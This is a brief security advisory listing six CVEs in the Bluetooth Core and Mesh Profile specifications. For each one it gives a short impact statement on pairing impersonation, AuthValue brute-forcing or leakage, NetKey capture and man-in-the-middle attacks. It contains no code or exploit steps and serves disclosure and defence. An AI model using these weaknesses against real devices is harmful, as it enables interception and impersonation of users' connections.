Security Vulnerabilities in Bluetooth Core and Mesh Profile Specifications

The Bluetooth Core and Mesh Profile specifications are the standards defining technical and policy requirements. These requirements describe how devices communicate and operate over low-energy wireless technology to enable interoperable mesh networking solutions. Several vulnerabilities have been found, which could be exploited by an attacker to launch Man-in-the-Middle (MitM) attacks.

• CVE-2020-26555 - Impersonation in the BR/EDR pin-pairing protocol
  • Impact:  An attacker could complete pairing with a known link key, encrypt communications with the other device, and access any profiles permitted by a paired device supporting Legacy Pairing
• CVE-2020-26556 - Malleable commitment in Bluetooth Mesh Profile provisioning
  • Impact: An attacker could obtain a NetKey, decrypting and authenticating up to the network layer, allowing the relay of messages
• CVE-2020-26557 - Predictable AuthValue in Bluetooth Mesh Profile provisioning leads to MitM
  • Impact: An attacker could brute force the AuthValue and authenticate to both targeted devices, permitting a MitM attack
• CVE-2020-26558 - Impersonation in the Passkey entry protocol
  • Impact: An attacker could authenticate to the responder and act a as a legitimate encrypted device.
• CVE-2020-26559 - Bluetooth Mesh Profile AuthValue leak
  • Impact: An attacker could compute the AuthValue and authenticate to the targeted devices.
• CVE-2020-26560 - Impersonation attack in Bluetooth Mesh Profile provisioning
  • Impact: An attacker could successfully authenticate without AuthValue and perform any operation permitted to a node on that subnet.